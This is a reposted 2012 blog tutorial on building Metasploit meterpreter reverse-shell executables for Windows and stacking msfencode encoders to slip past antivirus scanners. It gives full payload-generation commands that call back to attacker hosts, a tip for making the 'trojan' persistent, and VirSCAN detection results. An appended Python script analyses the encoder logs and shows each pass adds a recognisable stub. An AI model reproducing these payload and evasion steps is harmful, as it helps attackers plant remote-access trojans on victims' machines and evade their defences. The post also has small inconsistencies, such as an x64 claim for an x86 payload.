Metasploit reverse shell AV evasion
Posted on 2012-8-5 20:53:19
rootkithat is an old alias of mine; this is an article I wrote back then.

First we generate a reverse shell for x64 Windows XP:

    root@rootkithat:/opt/framework-3.7.1/msf3# ./msfpayload windows/meterpreter/reverse_tcp LHOST=1.1.1.1 LPORT=4321 R > /tmp/xp.exe

Tip: you can use scheduleme -m 1 -u e /tmp/x64.exe to make your trojan more persistent.

Submit it to VirSCAN (世界杀毒网).

——————————————
8% of the AV engines (3/37) reported a virus. Let's encode it and see whether that gets it past AV.
First, list the encoders that ship with Metasploit:

    root@rootkithat:/opt/framework-3.7.1/msf3# ./msfencode -l

    Framework Encoders
    ==================

        Name                      Rank       Description
        ----                      ----       -----------
        cmd/generic_sh            good       Generic Shell Variable Substitution Command Encoder
        cmd/ifs                   low        Generic ${IFS} Substitution Command Encoder
        cmd/printf_php_mq         manual     printf(1) via PHP magic_quotes Utility Command Encoder
        generic/none              normal     The "none" Encoder
        mipsbe/longxor            normal     XOR Encoder
        mipsle/longxor            normal     XOR Encoder
        php/base64                great      PHP Base64 encoder
        ppc/longxor               normal     PPC LongXOR Encoder
        ppc/longxor_tag           normal     PPC LongXOR Encoder
        sparc/longxor_tag         normal     SPARC DWORD XOR Encoder
        x64/xor                   normal     XOR Encoder
        x86/alpha_mixed           low        Alpha2 Alphanumeric Mixedcase Encoder
        x86/alpha_upper           low        Alpha2 Alphanumeric Uppercase Encoder
        x86/avoid_utf8_tolower    manual     Avoid UTF8/tolower
        x86/call4_dword_xor       normal     Call+4 Dword XOR Encoder
        x86/context_cpuid         manual     CPUID-based Context Keyed Payload Encoder
        x86/context_stat          manual     stat(2)-based Context Keyed Payload Encoder
        x86/context_time          manual     time(2)-based Context Keyed Payload Encoder
        x86/countdown             normal     Single-byte XOR Countdown Encoder
        x86/fnstenv_mov           normal     Variable-length Fnstenv/mov Dword XOR Encoder
        x86/jmp_call_additive     normal     Jump/Call XOR Additive Feedback Encoder
        x86/nonalpha              low        Non-Alpha Encoder
        x86/nonupper              low        Non-Upper Encoder
        x86/shikata_ga_nai        excellent  Polymorphic XOR Additive Feedback Encoder
        x86/single_static_bit     manual     Single Static Bit
        x86/unicode_mixed         manual     Alpha2 Alphanumeric Unicode Mixedcase Encoder
        x86/unicode_upper         manual     Alpha2 Alphanumeric Unicode Uppercase Encoder

    root@rootkithat:/opt/framework-3.7.1/msf3#
The following run encodes the payload 6 times:

    root@rootkithat:/opt/framework-3.7.1/msf3# ./msfpayload windows/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=1122 R | ./msfencode -t exe -o /tmp/x2.exe -e x86/shikata_ga_nai -c 6
    [*] x86/shikata_ga_nai succeeded with size 317 (iteration=1)
    [*] x86/shikata_ga_nai succeeded with size 344 (iteration=2)
    [*] x86/shikata_ga_nai succeeded with size 371 (iteration=3)
    [*] x86/shikata_ga_nai succeeded with size 398 (iteration=4)
    [*] x86/shikata_ga_nai succeeded with size 425 (iteration=5)
    [*] x86/shikata_ga_nai succeeded with size 452 (iteration=6)
    root@rootkithat:/opt/framework-3.7.1/msf3#
Submitted to VirSCAN again; it still gets flagged:

    File name : x2.exe (this site does not offer downloads of any file)
    File size : 73802 byte
    File type : PE32 executable for MS Windows (GUI) Intel 80386 32-bit
    MD5 : 5fbf2d47978ab2e1e110fc1dc62c1dda
    SHA1 : b7b8d7881afd915bf7a5fd1050b4fe0d3456a177
    Scan result : 32% of the AV engines (12/37) reported a virus

So let's encode it 61 times!
    root@rootkithat:/opt/framework-3.7.1/msf3# ./msfpayload windows/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=1122 R | ./msfencode -t exe -o /tmp/x3.exe -e x86/shikata_ga_nai -c 61
    [*] x86/shikata_ga_nai succeeded with size 317 (iteration=1)
    [*] x86/shikata_ga_nai succeeded with size 344 (iteration=2)
    [*] x86/shikata_ga_nai succeeded with size 371 (iteration=3)
    [*] x86/shikata_ga_nai succeeded with size 398 (iteration=4)
    [*] x86/shikata_ga_nai succeeded with size 425 (iteration=5)
    [*] x86/shikata_ga_nai succeeded with size 452 (iteration=6)
    [*] x86/shikata_ga_nai succeeded with size 479 (iteration=7)
    [*] x86/shikata_ga_nai succeeded with size 506 (iteration=8)
    [*] x86/shikata_ga_nai succeeded with size 533 (iteration=9)
    [*] x86/shikata_ga_nai succeeded with size 560 (iteration=10)
    [*] x86/shikata_ga_nai succeeded with size 587 (iteration=11)
    [*] x86/shikata_ga_nai succeeded with size 614 (iteration=12)
    [*] x86/shikata_ga_nai succeeded with size 641 (iteration=13)
    [*] x86/shikata_ga_nai succeeded with size 668 (iteration=14)
    [*] x86/shikata_ga_nai succeeded with size 695 (iteration=15)
    [*] x86/shikata_ga_nai succeeded with size 722 (iteration=16)
    [*] x86/shikata_ga_nai succeeded with size 749 (iteration=17)
    [*] x86/shikata_ga_nai succeeded with size 776 (iteration=18)
    [*] x86/shikata_ga_nai succeeded with size 803 (iteration=19)
    [*] x86/shikata_ga_nai succeeded with size 830 (iteration=20)
    [*] x86/shikata_ga_nai succeeded with size 857 (iteration=21)
    [*] x86/shikata_ga_nai succeeded with size 884 (iteration=22)
    [*] x86/shikata_ga_nai succeeded with size 911 (iteration=23)
    [*] x86/shikata_ga_nai succeeded with size 938 (iteration=24)
    [*] x86/shikata_ga_nai succeeded with size 965 (iteration=25)
    [*] x86/shikata_ga_nai succeeded with size 992 (iteration=26)
    [*] x86/shikata_ga_nai succeeded with size 1019 (iteration=27)
    [*] x86/shikata_ga_nai succeeded with size 1046 (iteration=28)
    [*] x86/shikata_ga_nai succeeded with size 1075 (iteration=29)
    [*] x86/shikata_ga_nai succeeded with size 1104 (iteration=30)
    [*] x86/shikata_ga_nai succeeded with size 1133 (iteration=31)
    [*] x86/shikata_ga_nai succeeded with size 1162 (iteration=32)
    [*] x86/shikata_ga_nai succeeded with size 1191 (iteration=33)
    [*] x86/shikata_ga_nai succeeded with size 1220 (iteration=34)
    [*] x86/shikata_ga_nai succeeded with size 1249 (iteration=35)
    [*] x86/shikata_ga_nai succeeded with size 1278 (iteration=36)
    [*] x86/shikata_ga_nai succeeded with size 1307 (iteration=37)
    [*] x86/shikata_ga_nai succeeded with size 1336 (iteration=38)
    [*] x86/shikata_ga_nai succeeded with size 1365 (iteration=39)
    [*] x86/shikata_ga_nai succeeded with size 1394 (iteration=40)
    [*] x86/shikata_ga_nai succeeded with size 1423 (iteration=41)
    [*] x86/shikata_ga_nai succeeded with size 1452 (iteration=42)
    [*] x86/shikata_ga_nai succeeded with size 1481 (iteration=43)
    [*] x86/shikata_ga_nai succeeded with size 1510 (iteration=44)
    [*] x86/shikata_ga_nai succeeded with size 1539 (iteration=45)
    [*] x86/shikata_ga_nai succeeded with size 1568 (iteration=46)
    [*] x86/shikata_ga_nai succeeded with size 1597 (iteration=47)
    [*] x86/shikata_ga_nai succeeded with size 1626 (iteration=48)
    [*] x86/shikata_ga_nai succeeded with size 1655 (iteration=49)
    [*] x86/shikata_ga_nai succeeded with size 1684 (iteration=50)
    [*] x86/shikata_ga_nai succeeded with size 1713 (iteration=51)
    [*] x86/shikata_ga_nai succeeded with size 1742 (iteration=52)
    [*] x86/shikata_ga_nai succeeded with size 1771 (iteration=53)
    [*] x86/shikata_ga_nai succeeded with size 1800 (iteration=54)
    [*] x86/shikata_ga_nai succeeded with size 1829 (iteration=55)
    [*] x86/shikata_ga_nai succeeded with size 1858 (iteration=56)
    [*] x86/shikata_ga_nai succeeded with size 1887 (iteration=57)
    [*] x86/shikata_ga_nai succeeded with size 1916 (iteration=58)
    [*] x86/shikata_ga_nai succeeded with size 1945 (iteration=59)
    [*] x86/shikata_ga_nai succeeded with size 1974 (iteration=60)
    [*] x86/shikata_ga_nai succeeded with size 2003 (iteration=61)
    root@rootkithat:/opt/framework-3.7.1/msf3#
The result comes back as follows:

    File name : x3.exe (this site does not offer downloads of any file)
    File size : 73802 byte
    File type : PE32 executable for MS Windows (GUI) Intel 80386 32-bit
    MD5 : cca64d1b86e0e6b453d296a72b343f58
    SHA1 : d0d7645b8c319ff02b7bbdb36efbec8f4292956e
    Scan result : 32% of the AV engines (12/37) reported a virus
    Time : 2011/06/19 20:35:15 (CST)

Looks like that is a dead end; too many people use it. Time for the big move: mixed encoding.
    root@rootkithat:/opt/framework-3.7.1/msf3# ./msfpayload windows/meterpreter/reverse_tcp LHOST=rootkithat.org LPORT=43958 R | ./msfencode -e x86/fnstenv_mov -t raw -c 10 | ./msfencode -t exe -c 10 > /tmp/x4.exe
    [*] x86/fnstenv_mov succeeded with size 314 (iteration=1)
    [*] x86/fnstenv_mov succeeded with size 338 (iteration=2)
    [*] x86/fnstenv_mov succeeded with size 362 (iteration=3)
    [*] x86/fnstenv_mov succeeded with size 386 (iteration=4)
    [*] x86/fnstenv_mov succeeded with size 410 (iteration=5)
    [*] x86/fnstenv_mov succeeded with size 434 (iteration=6)
    [*] x86/fnstenv_mov succeeded with size 458 (iteration=7)
    [*] x86/fnstenv_mov succeeded with size 482 (iteration=8)
    [*] x86/fnstenv_mov succeeded with size 506 (iteration=9)
    [*] x86/fnstenv_mov succeeded with size 530 (iteration=10)
    [*] x86/shikata_ga_nai succeeded with size 557 (iteration=1)
    [*] x86/shikata_ga_nai succeeded with size 584 (iteration=2)
    [*] x86/shikata_ga_nai succeeded with size 611 (iteration=3)
    [*] x86/shikata_ga_nai succeeded with size 638 (iteration=4)
    [*] x86/shikata_ga_nai succeeded with size 665 (iteration=5)
    [*] x86/shikata_ga_nai succeeded with size 692 (iteration=6)
    [*] x86/shikata_ga_nai succeeded with size 719 (iteration=7)
    [*] x86/shikata_ga_nai succeeded with size 746 (iteration=8)
    [*] x86/shikata_ga_nai succeeded with size 773 (iteration=9)
    [*] x86/shikata_ga_nai succeeded with size 800 (iteration=10)
    root@rootkithat:/opt/framework-3.7.1/msf3#

The result:

    File name : x4.exe (this site does not offer downloads of any file)
    File size : 73802 byte
    File type : PE32 executable for MS Windows (GUI) Intel 80386 32-bit
    MD5 : afd93f615507c34111b38595d45d5533
    SHA1 : d88f7a5a3a6bd24907dc3b83c76a461cac2f109e
    Scan result : 38% of the AV engines (14/37) reported a virus
    Time : 2011/06/19 20:41:46 (CST)

Damn it! Keep encoding, this time mixing four encoders:
    root@rootkithat:/opt/framework-3.7.1/msf3# ./msfpayload windows/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=21 R | ./msfencode -e x86/call4_dword_xor -t raw -c 5 | ./msfencode -e x86/countdown -t raw -c 5 | ./msfencode -e x86/fnstenv_mov -t raw -c 5 | ./msfencode -e x86/jmp_call_additive -t raw -c 5 | ./msfencode -t exe -c 5 > /tmp/5x.exe
    [*] x86/call4_dword_xor succeeded with size 316 (iteration=1)
    [*] x86/call4_dword_xor succeeded with size 340 (iteration=2)
    [*] x86/call4_dword_xor succeeded with size 364 (iteration=3)
    [*] x86/call4_dword_xor succeeded with size 388 (iteration=4)
    [*] x86/call4_dword_xor succeeded with size 412 (iteration=5)
    [*] x86/countdown succeeded with size 430 (iteration=1)
    [*] x86/countdown succeeded with size 448 (iteration=2)
    [*] x86/countdown succeeded with size 466 (iteration=3)
    [*] x86/countdown succeeded with size 484 (iteration=4)
    [*] x86/countdown succeeded with size 502 (iteration=5)
    [*] x86/fnstenv_mov succeeded with size 526 (iteration=1)
    [*] x86/fnstenv_mov succeeded with size 551 (iteration=2)
    [*] x86/fnstenv_mov succeeded with size 575 (iteration=3)
    [*] x86/fnstenv_mov succeeded with size 599 (iteration=4)
    [*] x86/fnstenv_mov succeeded with size 623 (iteration=5)
    [*] x86/jmp_call_additive succeeded with size 653 (iteration=1)
    [*] x86/jmp_call_additive succeeded with size 685 (iteration=2)
    [*] x86/jmp_call_additive succeeded with size 717 (iteration=3)
    [*] x86/jmp_call_additive succeeded with size 749 (iteration=4)
    [*] x86/jmp_call_additive succeeded with size 781 (iteration=5)
    [*] x86/shikata_ga_nai succeeded with size 808 (iteration=1)
    [*] x86/shikata_ga_nai succeeded with size 835 (iteration=2)
    [*] x86/shikata_ga_nai succeeded with size 862 (iteration=3)
    [*] x86/shikata_ga_nai succeeded with size 889 (iteration=4)
    [*] x86/shikata_ga_nai succeeded with size 916 (iteration=5)

Virus scan started... Progress: 25/37 (67%). Current engine: Norman. Previous engine: NOD32 found a variant of Win32/Rozena.AH trojan. Suspicion level: 10/37 (27%)

Nothing more to be done; we will have to wait for the next official update of the encoding algorithms.
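The numbers in the runs above explain the outcome better than the detection percentages do. Every msfencode pass wraps the previous output in a decoder stub, and the size column grows by a constant amount per pass for each encoder (27 bytes for shikata_ga_nai, 18 for countdown, and so on), so stacking more passes only adds more copies of the same recognisable stub in front of the same payload. The following script is an added example written for this edit, not code from the post or from Metasploit: it parses the "[*] ... succeeded with size N (iteration=k)" progress lines (the sample log is copied from the four-encoder run above), reports the per-pass overhead of each encoder, flags logs whose iteration counters or sizes are inconsistent, and tabulates the post's own detection counts. The raw stager size is not given in the post, so the first pass's overhead is only computed when a raw_size is supplied. Analysing a build log this way is how a defender confirms that the decoder prefix, not the payload, is what the engines are matching.

```python
import re
from collections import OrderedDict

# Constructed sample: the progress lines from the post's "four encoders mixed" run
# (sizes copied from that run; prompt and command line omitted).
SAMPLE_LOG = """
[*] x86/call4_dword_xor succeeded with size 316 (iteration=1)
[*] x86/call4_dword_xor succeeded with size 340 (iteration=2)
[*] x86/call4_dword_xor succeeded with size 364 (iteration=3)
[*] x86/call4_dword_xor succeeded with size 388 (iteration=4)
[*] x86/call4_dword_xor succeeded with size 412 (iteration=5)
[*] x86/countdown succeeded with size 430 (iteration=1)
[*] x86/countdown succeeded with size 448 (iteration=2)
[*] x86/countdown succeeded with size 466 (iteration=3)
[*] x86/countdown succeeded with size 484 (iteration=4)
[*] x86/countdown succeeded with size 502 (iteration=5)
[*] x86/fnstenv_mov succeeded with size 526 (iteration=1)
[*] x86/fnstenv_mov succeeded with size 551 (iteration=2)
[*] x86/fnstenv_mov succeeded with size 575 (iteration=3)
[*] x86/fnstenv_mov succeeded with size 599 (iteration=4)
[*] x86/fnstenv_mov succeeded with size 623 (iteration=5)
[*] x86/jmp_call_additive succeeded with size 653 (iteration=1)
[*] x86/jmp_call_additive succeeded with size 685 (iteration=2)
[*] x86/jmp_call_additive succeeded with size 717 (iteration=3)
[*] x86/jmp_call_additive succeeded with size 749 (iteration=4)
[*] x86/jmp_call_additive succeeded with size 781 (iteration=5)
[*] x86/shikata_ga_nai succeeded with size 808 (iteration=1)
[*] x86/shikata_ga_nai succeeded with size 835 (iteration=2)
[*] x86/shikata_ga_nai succeeded with size 862 (iteration=3)
[*] x86/shikata_ga_nai succeeded with size 889 (iteration=4)
[*] x86/shikata_ga_nai succeeded with size 916 (iteration=5)
"""

# Detection counts exactly as reported in the post, one entry per build:
# (label, encoder passes applied, engines flagging it, engines total).
# The 5x.exe figure is the mid-scan snapshot the post shows (25 of 37 engines done).
DETECTIONS = [
    ("xp.exe (no encoding)", 0, 3, 37),
    ("x2.exe (shikata_ga_nai x6)", 6, 12, 37),
    ("x3.exe (shikata_ga_nai x61)", 61, 12, 37),
    ("x4.exe (fnstenv_mov x10 + shikata_ga_nai x10)", 20, 14, 37),
    ("5x.exe (five encoders x5, mid-scan)", 25, 10, 37),
]

LINE_RE = re.compile(
    r"\[\*\]\s+(?P<enc>\S+)\s+succeeded with size\s+(?P<size>\d+)\s+\(iteration=(?P<it>\d+)\)"
)


def parse_log(text):
    """Extract (encoder, iteration, size) from msfencode progress lines, in log order."""
    return [(m.group("enc"), int(m.group("it")), int(m.group("size")))
            for m in LINE_RE.finditer(text)]


def check_log(steps):
    """Return a list of inconsistencies: iteration counters that do not restart at 1
    when the encoder changes or do not advance by one, and sizes that fail to grow.
    A pass can only add a decoder stub, so a shrinking size means a corrupt log."""
    problems = []
    prev_enc, prev_it, prev_size = None, 0, 0
    for enc, it, size in steps:
        expected = 1 if enc != prev_enc else prev_it + 1
        if it != expected:
            problems.append(f"{enc}: iteration {it}, expected {expected}")
        if size <= prev_size:
            problems.append(f"{enc} iteration {it}: size {size} not larger than {prev_size}")
        prev_enc, prev_it, prev_size = enc, it, size
    return problems


def stub_sizes(steps, raw_size=None):
    """Bytes added by each pass, grouped by encoder in pipeline order. The first
    pass's overhead needs the raw payload size; without raw_size it is skipped."""
    added = OrderedDict()
    prev = raw_size
    for enc, _it, size in steps:
        added.setdefault(enc, [])
        if prev is not None:
            added[enc].append(size - prev)
        prev = size
    return added


def summarize(steps, raw_size=None):
    """One row per encoder: passes and the range of per-pass overhead. A constant
    overhead means each pass prepends a same-sized stub: a fixed, recognisable prefix."""
    rows = OrderedDict()
    for enc, deltas in stub_sizes(steps, raw_size).items():
        rows[enc] = {
            "passes": sum(1 for e, _, _ in steps if e == enc),
            "min_delta": min(deltas) if deltas else None,
            "max_delta": max(deltas) if deltas else None,
        }
    return rows


def detection_ratio(flagged, total):
    """Percentage of engines flagging the file, rounded as the scan service reports it."""
    return round(100.0 * flagged / total)


def least_detected(results):
    """Label of the build with the lowest detection ratio."""
    return min(results, key=lambda r: r[2] / r[3])[0]


if __name__ == "__main__":
    steps = parse_log(SAMPLE_LOG)
    for problem in check_log(steps):
        print("warning:", problem)
    for enc, row in summarize(steps).items():
        print(f"{enc:24s} passes={row['passes']} per-pass bytes={row['min_delta']}..{row['max_delta']}")
    print(f"final encoded size: {steps[-1][2]} bytes after {len(steps)} passes")
    for label, passes, hit, total in DETECTIONS:
        print(f"{label:48s} {passes:3d} passes  {hit}/{total} = {detection_ratio(hit, total)}%")
    print("least detected build:", least_detected(DETECTIONS))
```

Run it as is to see that the per-pass overhead is flat for every encoder in the chain and that the least-detected build in the post is the one with no encoding at all; pass a real msfencode log to parse_log to analyse a different chain.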


